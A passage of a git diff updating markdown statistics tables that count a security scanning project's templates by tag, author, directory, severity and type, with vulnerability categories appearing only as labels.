6 | | | | | | | +| debug | 14 | pentest_swissky | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| cve2014 | 14 | panch0r3d | 5 | | | | | | | +| android | 13 | yanyun | 5 | | | | | | | +| misconfig | 13 | joanbono | 5 | | | | | | | +| struts | 13 | iamnoooob | 5 | | | | | | | +| auth-bypass | 13 | ganofins | 5 | | | | | | | +| cve2011 | 13 | meme-lord | 5 | | | | | | | +| adobe | 12 | e_schultze_ | 4 | | | | | | | +| dns | 12 | github.com/its0x08 | 4 | | | | | | | +| weblogic | 12 | xelkomy | 4 | | | | | | | +| jenkins | 12 | elsfa7110 | 4 | | | | | | | +| dlink | 12 | nodauf | 4 | | | | | | | +| devops | 11 | jarijaas | 3 | | | | | | | +| fuzz | 11 | fyoorer | 3 | | | | | | | +| zoho | 11 | _generic_human_ | 3 | | | | | | | +| php | 11 | vsh00t | 3 | | | | | | | +| joomla | 11 | f1tz | 3 | | | | | | | +| cve2013 | 11 | dudez | 3 | | | | | | | +| router | 11 | tess | 3 | | | | | | | +| magento | 9 | thomas_from_offensity | 3 | | | | | | | +| ftp | 8 | mavericknerd | 3 | | | | | | | +| xxe | 8 | impramodsargar | 3 | | | | | | | +| rails | 8 | yash anand @yashanand155 | 3 | | | | | | | +| cnvd | 8 | shine | 3 | | | | | | | +| gitlab | 8 | emenalf | 3 | | | | | | | +| airflow | 8 | shifacyclewala | 3 | | | | | | | +| aws | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | binaryfigments | 3 | | | | | | | +| vmware | 7 | 0w4ys | 3 | | | | | | | +| cve2009 | 7 | lotusdll | 2 | | | | | | | +| scada | 7 | gevakun | 2 | | | | | | | +| login | 7 | randomrobbie | 2 | | | | | | | +| nginx | 7 | hahwul | 2 | | | | | | | +| dell | 6 | koti2 | 2 | | | | | | | +| cve2010 | 6 | ree4pwn | 2 | | | | | | | +| cms | 6 | random-robbie | 2 | | | | | | | +| coldfusion | 6 | pxmme1337 | 2 | | | | | | | +| rconfig | 6 | amsda | 2 | | | | | | | +| solr | 6 | lu4nx | 2 | | | | | | | +| laravel | 6 | zomsop82 | 2 | | | | | | | +| api | 6 | 0xsapra | 2 | | | | | | | +| citrix | 6 | alifathi-h1 | 2 | | | | | | | +| jetty | 6 | afaq | 2 | | | | | | | +| google | 6 | swissky | 2 | | | | | | | +| backup | 6 | w4cky_ | 2 | | | | | | | +| drupal | 5 | bsysop | 2 | | | | | | | +| headless | 5 | 0xelkomy | 2 | | | | | | | +| lucee | 5 | sushantkamble | 2 | | | | | | | +| iis | 5 | dheerajmadhukar | 2 | | | | | | | +| ibm | 5 | ehsahil | 2 | | | | | | | +| files | 5 | davidmckennirey | 2 | | | | | | | +| wp-theme | 5 | bp0lr | 2 | | | | | | | +| java | 5 | udit_thakkur | 2 | | | | | | | +| circarlife | 5 | manas_harsh | 2 | | | | | | | +| ssti | 5 | 0xprial | 2 | | | | | | | +| fileupload | 5 | hetroublemakr | 2 | | | | | | | +| netgear | 5 | joeldeleep | 2 | | | | | | | +| confluence | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| django | 5 | vavkamil | 2 | | | | | | | +| phpmyadmin | 5 | incogbyte | 2 | | | | | | | +| dedecms | 5 | 0xrudra | 2 | | | | | | | +| windows | 4 | fabaff | 2 | | | | | | | +| docker | 4 | x1m_martijn | 2 | | | | | | | +| solarwinds | 4 | 0xcrypto | 2 | | | | | | | +| tomcat | 4 | gal nagli | 2 | | | | | | | +| vpn | 4 | foulenzer | 2 | | | | | | | +| magmi | 4 | nkxxkn | 2 | | | | | | | +| webserver | 4 | unstabl3 | 2 | | | | | | | +| nodejs | 4 | moritz nentwig | 2 | | | | | | | +| thinkphp | 4 | bing0o | 2 | | | | | | | +| deserialization | 4 | kiblyn11 | 2 | | | | | | | +| asp | 4 | makyotox | 1 | | | | | | | +| moodle | 4 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| jolokia | 4 | micha3lb3n | 1 | | | | | | | +| crlf | 4 | defr0ggy | 1 | | | | | | | +| thinkcmf | 4 | mohammedsaneem | 1 | | | | | | | +| samsung | 4 | alph4byt3 | 1 | | | | | | | +| zimbra | 4 | furkansenan | 1 | | | | | | | +| traversal | 4 | ratnadip gajbhiye | 1 | | | | | | | +| artifactory | 4 | apt-mirror | 1 | | | | | | | +| hongdian | 4 | thevillagehacker | 1 | | | | | | | +| elastic | 4 | mah3sec_ | 1 | | | | | | | +| springcloud | 3 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| printer | 3 | chron0x | 1 | | | | | | | +| ebs | 3 | qlkwej | 1 | | | | | | | +| backups | 3 | abison_binoy | 1 | | | | | | | +| resin | 3 | ldionmarcil | 1 | | | | | | | +| fanruan | 3 | johnk3r | 1 | | | | | | | +| kafka | 3 | _harleo | 1 | | | | | | | +| slack | 3 | bad5ect0r | 1 | | | | | | | +| bitrix | 3 | retr0 | 1 | | | | | | | +| microsoft | 3 | sickwell | 1 | | | | | | | +| bypass | 3 | me9187 | 1 | | | | | | | +| r-seenet | 3 | idealphase | 1 | | | | | | | +| itop | 3 | @dwisiswant0 | 1 | | | | | | | +| tikiwiki | 3 | berkdusunur | 1 | | | | | | | +| kubernetes | 3 | dawid czarnecki | 1 | | | | | | | +| openssh | 3 | zhenwarx | 1 | | | | | | | +| mongodb | 3 | regala_ | 1 | | | | | | | +| git | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | +| log | 3 | andirrahmani1 | 1 | | | | | | | +| targa | 3 | notsoevilweasel | 1 | | | | | | | +| kevinlab | 3 | revblock | 1 | | | | | | | +| caucho | 3 | b4uh0lz | 1 | | | | | | | +| httpd | 3 | akash.c | 1 | | | | | | | +| lfr | 3 | yavolo | 1 | | | | | | | +| zhiyuan | 3 | ooooooo_q | 1 | | | | | | | +| nacos | 3 | thezakman | 1 | | | | | | | +| fpd | 3 | elmahdi | 1 | | | | | | | +| hp | 3 | its0x08 | 1 | | | | | | | +| symfony | 3 | 0h1in9e | 1 | | | | | | | +| zabbix | 3 | whynotke | 1 | | | | | | | +| cve2008 | 3 | zandros0 | 1 | | | | | | | +| oa | 3 | gboddin | 1 | | | | | | | +| grafana | 3 | flag007 | 1 | | | | | | | +| ofbiz | 3 | patralos | 1 | | | | | | | +| vbulletin | 3 | hakluke | 1 | | | | | | | +| microstrategy | 3 | co0nan | 1 | | | | | | | +| opensis | 3 | shifacyclewla | 1 | | | | | | | +| terramaster | 3 | kabirsuda | 1 | | | | | | | +| amazon | 3 | arcc | 1 | | | | | | | +| wso2 | 3 | huowuzhao | 1 | | | | | | | +| nosqli | 3 | undefl0w | 1 | | | | | | | +| ssh | 3 | luskabol | 1 | | | | | | | +| idrac | 2 | _darrenmartyn | 1 | | | | | | | +| huawei | 2 | b0yd | 1 | | | | | | | +| mail | 2 | mesaglio | 1 | | | | | | | +| hasura | 2 | ilovebinbash | 1 | | | | | | | +| wordfence | 2 | juicypotato1 | 1 | | | | | | | +| maian | 2 | streetofhackerr007 | 1 | | | | | | | +| vrealize | 2 | nytr0gen | 1 | | | | | | | +| seeyon | 2 | knassar702 | 1 | | | | | | | +| hjtcloud | 2 | fmunozs | 1 | | | | | | | +| frp | 2 | divya_mudgal | 1 | | | | | | | +| openfire | 2 | noamrathaus | 1 | | | | | | | +| jeedom | 2 | shelld3v | 1 | | | | | | | +| trixbox | 2 | bolli95 | 1 | | | | | | | +| nextjs | 2 | rodnt | 1 | | | | | | | +| service | 2 | affix | 1 | | | | | | | +| jboss | 2 | sshell | 1 | | | | | | | +| status | 2 | schniggie | 1 | | | | | | | +| guacamole | 2 | elder tao | 1 | | | | | | | +| nagios | 2 | yashgoti | 1 | | | | | | | +| nexus | 2 | pratik khalane | 1 | | | | | | | +| glassfish | 2 | andysvints | 1 | | | | | | | +| oauth | 2 | rojanrijal | 1 | | | | | | | +| openam | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| keycloak | 2 | @github.com/defr0ggy | 1 | | | | | | | +| hpe | 2 | ajaysenr | 1 | | | | | | | +| shellshock | 2 | toufik airane | 1 | | | | | | | +| cache | 2 | naglinagli | 1 | | | | | | | +| horde | 2 | sicksec | 1 | | | | | | | +| activemq | 2 | philippdelteil | 1 | | | | | | | +| injection | 2 | hanlaomo | 1 | | | | | | | +| smtp | 2 | yashanand155 | 1 | | | | | | | +| plesk | 2 | iampritam | 1 | | | | | | | +| spark | 2 | sy3omda | 1 | | | | | | | +| voipmonitor | 2 | alperenkesk | 1 | | | | | | | +| xxljob | 2 | ohlinge | 1 | | | | | | | +| igs | 2 | sullo | 1 | | | | | | | +| akamai | 2 | alex | 1 | | | | | | | +| dolibarr | 2 | smaranchand | 1 | | | | | | | +| waf | 2 | daviey | 1 | | | | | | | +| rockethchat | 2 | d0rkerdevil | 1 | | | | | | | +| rockmongo | 2 | _c0wb0y_ | 1 | | | | | | | +| pega | 2 | c3l3si4n | 1 | | | | | | | +| emerge | 2 | tim_koopmans | 1 | | | | | | | +| natshell | 2 | manuelbua | 1 | | | | | | | +| prometheus | 2 | rtcms | 1 | | | | | | | +| kibana | 2 | 52971 | 1 | | | | | | | +| bigip | 2 | willd96 | 1 | | | | | | | +| chiyu | 2 | un-fmunozs | 1 | | | | | | | +| rstudio | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| jsf | 2 | cookiehanhoan | 1 | | | | | | | +| ecology | 2 | petruknisme | 1 | | | | | | | +| akkadian | 2 | absshax | 1 | | | | | | | +| paloalto | 2 | wabafet | 1 | | | | | | | +| proxy | 2 | blckraven | 1 | | | | | | | +| flir | 2 | 0xteles | 1 | | | | | | | +| globalprotect | 2 | bjhulst | 1 | | | | | | | +| backdoor | 2 | johnjhacking | 1 | | | | | | | +| dos | 2 | dogasantos | 1 | | | | | | | +| linkerd | 2 | taielab | 1 | | | | | | | +| odoo | 2 | j33n1k4 | 1 | | | | | | | +| intrusive | 2 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| mida | 2 | s1r1u5_ | 1 | | | | | | | +| jellyfin | 2 | tirtha_mandal | 1 | | | | | | | +| saltstack | 2 | aceseven (digisec360) | 1 | | | | | | | +| couchdb | 2 | mubassirpatel | 1 | | | | | | | +| avantfax | 2 | ringo | 1 | | | | | | | +| yapi | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| cve2005 | 2 | jteles | 1 | | | | | | | +| azure | 2 | 0xtavian | 1 | | | | | | | +| github | 2 | mass0ma | 1 | | | | | | | +| sharepoint | 2 | fopina | 1 | | | | | | | +| ucmdb | 2 | shreyapohekar | 1 | | | | | | | +| strapi | 2 | omarkurt | 1 | | | | | | | +| webcam | 2 | raesene | 1 | | | | | | | +| splunk | 2 | mhdsamx | 1 | | | | | | | +| sonarqube | 2 | bernardofsr | 1 | | | | | | | +| leak | 2 | ipanda | 1 | | | | | | | +| grav | 2 | exploitation | 1 | | | | | | | +| sonicwall | 2 | th3.d1p4k | 1 | | | | | | | +| fortios | 2 | kurohost | 1 | | | | | | | +| icewarp | 2 | becivells | 1 | | | | | | | +| phpcollab | 2 | aresx | 1 | | | | | | | +| smb | 2 | udyz | 1 | | | | | | | +| kentico | 2 | kba@sogeti_esec | 1 | | | | | | | +| chamilo | 2 | deena | 1 | | | | | | | +| cve2007 | 2 | pudsec | 1 | | | | | | | +| showdoc | 2 | luci | 1 | | | | | | | +| telerik | 2 | r3naissance | 1 | | | | | | | +| hashicorp | 2 | geraldino2 | 1 | | | | | | | +| dotnet | 1 | akshansh | 1 | | | | | | | +| opensns | 1 | kareemse1im | 1 | | | | | | | +| manageengine | 1 | remonsec | 1 | | | | | | | +| ntopng | 1 | adrianmf | 1 | | | | | | | +| centos | 1 | jeya seelan | 1 | | | | | | | +| nps | 1 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| xvr | 1 | soyelmago | 1 | | | | | | | +| lighttpd | 1 | 0xrod | 1 | | | | | | | +| websvn | 1 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| bash | 1 | vzamanillo | 1 | | | | | | | +| blackboard | 1 | pdp | 1 | | | | | | | +| moinmoin | 1 | ahmed sherif | 1 | | | | | | | +| ssltls | 1 | 0ut0fb4nd | 1 | | | | | | | +| tika | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| ec2 | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| axis | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| npm | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| prestashop | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 144aaf2e68..f3ea916ac5 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 576 | pikpikcu | 234 | Users | 1828 | info | 577 | http | 1696 | -| panel | 214 | dhiyaneshdk | 234 | | | high | 457 | file | 46 | -| xss | 213 | pdteam | 191 | | | medium | 385 | network | 35 | -| wordpress | 198 | daffainfo | 128 | | | critical | 218 | dns | 11 | -| exposure | 196 | dwisiswant0 | 127 | | | low | 156 | | | -| rce | 183 | geeknik | 127 | | | | | | | -| lfi | 168 | gy741 | 62 | | | | | | | -| cve2020 | 155 | madrobot | 60 | | | | | | | -| wp-plugin | 133 | princechaddha | 53 | | | | | | | -| tech | 100 | gaurang | 42 | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 576 | dhiyaneshdk | 234 | cves | 583 | info | 577 | http | 1696 | +| panel | 214 | pikpikcu | 234 | vulnerabilities | 262 | high | 457 | file | 46 | +| xss | 213 | pdteam | 191 | exposed-panels | 216 | medium | 385 | network | 35 | +| wordpress | 198 | daffainfo | 128 | exposures | 174 | critical | 218 | dns | 11 | +| exposure | 196 | geeknik | 127 | technologies | 158 | low | 156 | | | +| rce | 183 | dwisiswant0 | 127 | misconfiguration | 124 | | | | | +| lfi | 168 | gy741 | 62 | takeovers | 70 | | | | | +| cve2020 | 155 | madrobot | 60 | default-logins | 50 | | | | | +| wp-plugin | 133 | princechaddha | 